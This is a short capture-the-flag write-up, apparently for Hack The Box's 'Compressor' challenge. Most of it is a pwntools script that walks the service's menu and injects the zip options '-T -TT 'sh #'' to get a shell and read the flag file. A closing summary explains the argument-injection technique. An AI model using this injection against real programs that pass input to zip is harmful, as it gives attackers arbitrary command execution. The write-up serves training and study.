Post

HackTheBox Compressor Writeup

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the Compressor Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

from pwn import *
import time

def exploit(ip, port):
    p = remote(ip, int(port))
    p.sendlineafter(b'[*] Choose component: ', b'1')
    p.sendlineafter(b'[*] Choose action: ', b'1')
    p.sendlineafter(b'Insert name: ', b'htb')
    p.sendlineafter(b'Insert content: ', b'htb')
    p.sendlineafter(b'[*] Choose action: ', b'3')
    p.sendlineafter(b'Insert <name>.zip: ', b'htb')
    p.sendlineafter(b'Insert <name>: ', b'htb')
    p.sendlineafter(b'Insert <options>: ', b'-T -TT \'sh #\'')
    p.sendline(b"cat ~/flag.txt")
    p.interactive()

if __name__ == "__main__":
    import sys
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    ip, port = sys.argv[1].split(':')
    exploit(ip, port)

reference

Summary

The Compressor Challenge on Hack The Box showcases command injection vulnerabilities in Linux utilities. By exploiting the zip command with carefully crafted options (-T -TT), you can achieve arbitrary code execution. This challenge introduces beginners to leveraging insecure command execution techniques, referencing tools like GTFOBins for practical exploitation. With basic Linux terminal knowledge, you manipulate arguments to gain shell access and retrieve the flag, demonstrating real-world exploitation of misconfigured programs.

challenge
htb challenge writeup linux misc
This post is licensed under CC BY 4.0 by the author.